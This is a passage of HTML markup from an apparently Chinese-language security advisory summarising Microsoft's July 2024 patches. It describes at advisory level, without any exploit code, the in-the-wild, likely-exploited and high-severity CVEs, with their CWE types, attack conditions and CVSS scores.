0);">微软本次修复中，CVE-2024-38080和CVE-2024-38112被在野利用，CVE-2024-35264和CVE-2024-37985被公开披露。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><table align="center" data-sort="sortDisabled" width="578"><tbody><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVE</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">漏洞名称</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVSS3.1</span></td></tr><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-38080</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows Hyper-V本地权限提升漏洞</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-38112</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows MSHTML平台欺骗漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">7.5/7.0</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">CVE-2024-35264</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">.NET和Visual Studio远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">8.1/7.1</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38080：Windows Hyper-V本地权限提升漏洞</span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Windows Hyper-V中的整数溢出或环绕漏洞（CWE-190）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38112：Windows MSHTML平台欺骗漏洞</span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Windows MSHTML平台中的资源暴露在错误的领域漏洞（CWE-668）。未经身份认证的远程攻击者通过向受害者发送恶意文件，并说服其打开该文件来利用此漏洞。由于此漏洞需要攻击者在利用之前准备目标环境，所以攻击复杂度较高。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-35264：.NET和Visual Studio远程代码执行漏洞</span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞被公开披露。此漏洞是.NET和Visual Studio中的释放后重用UAF漏洞（CWE-416）。未经身份认证的远程攻击者通过在处理请求主体时关闭http/3流来利用此漏洞。成功利用此漏洞的攻击者可以获得在目标系统上下文执行任意代码的能力。利用此漏洞需要攻击者赢得竞争条件。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38021</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Office远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38023</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.2/6.3</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38024</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.2/6.3</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38094</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.2/6.3</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38052</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming WOW Thunk服务驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38054</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming WOW Thunk服务驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38059</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38066</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38060</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Imaging组件远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38079</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows图形组件本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38085</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows图形组件本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38099</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Remote Desktop授权服务拒绝服务漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">5.9/5.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38100</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows File Explorer本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38021：Microsoft Office远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Microsoft Office中的输入验证不当漏洞（CWE-20）。未经身份认证的远程攻击者通过向受害者发送一个绕过受保护视图协议的恶意链接，并说服其打开该链接来利用此漏洞。成功利用此漏洞的攻击者可以获得高权限，包括读取、写入和删除功能。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38023、CVE-2024-38024、CVE-2024-38094：Microsoft SharePoint Server远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">这些漏洞都是Microsoft SharePoint Server中的不受信任数据的反序列化漏洞（CWE-502）。经过身份认证且拥有站点所有者权限或更高权限的攻击者通过将特制文件上传到目标SharePoint Server，并制作专门的API请求以触发文件参数的反序列化来利用这些漏洞。成功利用这些漏洞的攻击者能够注入任意代码，并在SharePoint Server上下文中执行此代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38052、CVE-2024-38054：Kernel Streaming WOW Thunk服务驱动本地权限提升漏洞</span></span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38052是Kernel Streaming WOW Thunk服务驱动中的不正确的输入验证漏洞（CWE-20）。CVE-2024-38054是该驱动中的堆溢出漏洞（CWE-122）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38059、CVE-2024-38066：Windows Win32k本地权限提升漏洞</span></span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38059和CVE-2024-38066都是Windows Win32k中的释放后重用UAF漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38060：Windows Imaging组件远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows Imaging组件中的堆溢出漏洞（CWE-122）。经过普通用户身份认证的远程攻击者通过将恶意TIFF文件上传到服务器来利用此漏洞。成功利用此漏洞的攻击者能够在受害者系统上下文中执行任意代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38079、CVE-2024-38085：Windows图形组件本地权限提升漏洞</span></span></span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-38079是Windows图形组件中的堆溢出漏洞（CWE-122）。CVE-2024-38085是该组件中的释放后重用UAF漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">CVE-2024-38099：Windows Remote Desktop授权服务拒绝服务漏洞</span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">该漏洞是Windows Remote Desktop授权服务中的认证不当漏洞（CWE-287）。成功利用此漏洞需要攻击者拥有高级逆向工程技能来识别并获得对特定远程过程调用(RPC)端点的未经授权的访问。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">CVE-2024-38100：Windows File Explorer本地权限提升漏洞</span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">该漏洞是Windows File Explorer中的访问控制不当漏洞（CWE-284）。普通本地用户可以绕过已实施的安全限制并获得目标系统的Administrator权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38074</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Remote Desktop授权服务远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38076</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Remote Desktop授权服务远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38077</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Remote Desktop授权服务远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38089</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Defender for IoT权限提升漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.1/7.9</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-20701</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">SQL Server Native Client OLE DB提供程序远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-28899</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Secure Boot安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38074、CVE-2024-38076、CVE-2024-38077：Windows Remote Desktop授权服务远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-38074是Windows Remote Desktop授权服务中的整数下溢或回绕漏洞（CWE-191）。CVE-2024-38076和CVE-2024-38077都是该组件中的堆溢出漏洞（CWE-122）。未经身份认证的远程攻击者通过向设置为远程桌面授权服务器的服务器发送特制的数据包来利用这些漏洞。成功利用这些漏洞的攻击者可以获得在目标服务器系统上下文中执行任意代码的能力。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 